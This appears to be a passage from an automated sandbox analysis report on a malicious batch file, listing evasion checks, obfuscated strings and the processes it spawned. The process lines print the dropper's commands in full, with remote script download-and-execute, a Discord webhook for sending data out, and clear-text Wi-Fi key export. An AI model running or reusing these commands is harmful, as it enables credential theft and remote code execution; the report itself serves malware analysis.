            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: global traffic HTTP traffic detected:
                GET /line/?fields=hosting HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                Host: ip-api.com
                Connection: Keep-Alive
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Service
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDisk
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_StartupCommand
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 48_2_000002A874014F20 rdtscp 48_2_000002A874014F20
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2846Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3867Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2047Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4595Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 580Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6632Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3132Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7714Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1904Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4772
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4975
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3799
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6028
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436 | Thread sleep count: 2846 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440 | Thread sleep count: 3867 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584 | Thread sleep count: 2047 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584 | Thread sleep count: 4595 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612 | Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636 | Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888 | Thread sleep count: 580 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888 | Thread sleep count: 80 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180 | Thread sleep count: 6632 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184 | Thread sleep count: 3132 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208 | Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5300 | Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720 | Thread sleep time: -17524406870024063s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5024 | Thread sleep count: 3799 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972 | Thread sleep count: 6028 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3624 | Thread sleep time: -21213755684765971s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystemProduct
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def
            Source: powershell.exe, 0000001F.00000002.1828500857.000001AE12760000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %wakEfMV%s%cojzOPIe%%vogJUEbI%e%ebzsysTD%%laiSicjT%t%fQcShQemU% %NuUzuJtn%/%nDxuTEzg%%pfSMieA%a%QplGTrgZ% %UWnAzcE%a%nvFBkIR%%fjrIQUMiO%n%zcvhjdLFz%%mzsMGgF%s%GcmLnbC%%BgEmeYpv%=%pMGywEtmT%%LLvvlYTVO%2%COexsRh%%ExxYNJzn%*%JUznDAFoA%%zVHhkRFwF%0%xScWFnxmj%%avCKDEdqu%x%QUtfhXCb%%zyYtrbr%3%BEeEZmlkv%%mluphFm%*%uytJOtur%%KTgHGBd%0%KPQgTNMwx%%BPfdOCP%x%APAXDlCAX%%SsBGbanLm%3%XEwKdEbx%%UkbUZsvZx%*%bBqWivDE%%wFCNSCSCL%0%WSwXrqbUB%%odhNmJba%x%qSspIPQwr%%yPqqZDQDf%1%gWHRDyoW%%mHvDIccQF%7%MkUFkgFnc%%mXWPaZgSE%*%TfgKYuXNQ%%HJozCLxYO%0%JNxbZhZjg%%IIZfEgBYB%4%DzDvOxM%%BMUqtbadN%5%SHFlEJBw%%EmuYLnEI%*%rzJPsjpco%%pzFbbGVeF%0%ssHOGgXF%%CFyrsZBh%x%GIJIsOcy%%zncFnHeA%2%SAXjsAOZe%%gEPXiXyu%5%vSKVLCy%
            Source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\user-PC\root\cimv2:Win32_Service.Name="vmicvss"
            Source: powershell.exe, 00000028.00000002.2916277864.0000017E80442000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmicvssr
            Source: powershell.exe, 0000001F.00000002.1828500857.000001AE12760000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %jhZwFJrEQ%f%HJENGKG%%PIkGVpiM%o%fBEJLKwkb%%XsGpQMyT%r%VfTUMvQWo% %YTimIren%/%ByvgNYtIe%%cvhQWLoI%l%WoluWdjVp% %%u %EkJsXojCR%i%ICpMnLvk%%kZoNLFGY%n%LARRHdPcj% %HJMvMaHNb%(%FJfTSkOcw%%LbyyFQGhM%4%holCjom%%rFmAAftrB%2%gMbWonbXb%%fPSksLPQT%8%eqTwsiX%%hkFXwrN%,%MIQDwJkwb% %hGFsWRGRw%4%tImrQIXb%%HPPInImuQ%2%fOcMPyQ%%tPZvHMf%8%GMnKLZtY%%fHBWRne%,%iQlQevF% %vAxctCbR%4%SeEGnbJF%%CQaAtDFyG%2%dEHURwaUp%%yNHJnYkI%8%jKJywkQRW%%stUMlvDK%)%ZCQzSoyY% %WoyeTiJj%d%dcobDZIoX%%vwRzTvnD%o%kRgWpPtp% %HEHqMYxBF%(%qxrydzMB% %PdIEHCnx%s%UwusUzu%%JrMyPeZOG%^%zIUiepTZ%%AQrydrW%e%wnPzFiN%%JSJgpkPJw%t%tSBWgouLq% %exSapBV%"%szhGatTqZ%%ybLstiW%O%ArdvsTl%%XldoMaxpS%1%KNMLNhp%%FlDBOvt%=%oVJDIDl%%tdnkSFFZ%N%nvsBQxRv%%fPOIrbxO%"%dboGvGN% %UKtiGyQFq%)%hraXXmbp%
            Source: powershell.exe, 0000001F.00000002.1828500857.000001AE12760000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %HQOOuhKl%s%WFhjBtcRQ%%TDPCjZhx%^%QJItmSxl%%oxCKsrW%e%tuvDcQAnB%%FGflIochq%^%fftEfRzLB%%GqzlqIoe%t%xdkStLixy% %KnPCDHlNK%/%TLeujVYD%%GCUOXzKU%a%dtcIAYO% %pMLQfGswQ%a%zSjvLjUF%%VnHFfAM%^%hVDmzHMl%%rCUKVVfq%n%LxClGAMh%%BaxqbKq%^%rOoRlhMwa%%yGPLEDMQ%s%FiCNoSq%%bKUmdKeZ%^%qPJknuV%%ChQemug%=%zbveWFhpL%%ArqlDxpb%2%fogoRXO%%KZLZtIr%*%OAuhDtsa%%OzVwIUxrs%0%EzxZVKZ%%TkPMhlIl%x%CcCtNWJCY%%JMlMmVVth%b%rqHadpbe%%MkyPPFt%*%uheScgw%%UjppRgGu%0%zFrlTvQcQ%%eFtNVIV%1%FCHvDUm%%lHYEygBpE%3%pgxtpyp%%SiwzvxF%*%fuUwFfrP%%blqAgFB%(%qhwmWVW%%lTisDYXt%0%BiSbeRk%%vxxiopH%x%GjAkPny%%IoaPkAFSJ%7%wXSqXEhDl%%LapMpPX%1%vYnRGIYS%%BFkMXloZn%c%XCBqgFxW%%eAJeXGV%^%pUByqBMD%%hRtsyRTdR%^%xgWWogax%%lFuCyAwEn%0%TGRjzDUkm%%cXXqrUw%1%XkIOUijkG%%YlKuViF%3%sjfXiWfp%%rrGkByIt%2%XaJMSaP%%hfICwIkb%3%pXhuSXyc%%grhcHdHQY%)%geseIWz%
            Source: powershell.exe, 00000030.00000002.2636336709.000002A872CED000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: powershell.exe, 0000002C.00000002.2215777823.00000201E2FDD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWI
            Source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\user-PC\root\cimv2:Win32_Service.Name="vmicshutdown"
            Source: powershell.exe, 00000014.00000002.1784865495.000001EC5F0C4000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000002B.00000003.2047003000.00000179D1FC5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: powershell.exe, 00000028.00000002.2901496097.0000017E80180000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 48_2_000002A874014F20 rdtscp 48_2_000002A874014F20
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cscript.exe cscript //nologo temp.vbs
            Source: C:\Windows\System32\cscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /i "C:\Users\user\Desktop\pirates.bat"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -c "Write-Host -NoNewLine $null"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net session
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\doskey.exe doskey CALL=SHIFT
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s kematian.ps1
            Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1241088645289480213/opjqqaosqwrak2j4o5xsc-dugkqcfdvi3tjvq0bt27lstvxcelwx2krem6jwt15zqiyc' | out-file -filepath 'kematian.ps1' -encoding ascii"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile -executionpolicy bypass -command "$bytes = [system.io.file]::readallbytes('c:\users\user\desktop\pirates.bat') ; if (($bytes[0] -ne 0xff) -or ($bytes[1] -ne 0xfe)) { write-host 'the first 3 bytes of the file are not ff fe 0a.' ; taskkill /f /im cmd.exe }"
            Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
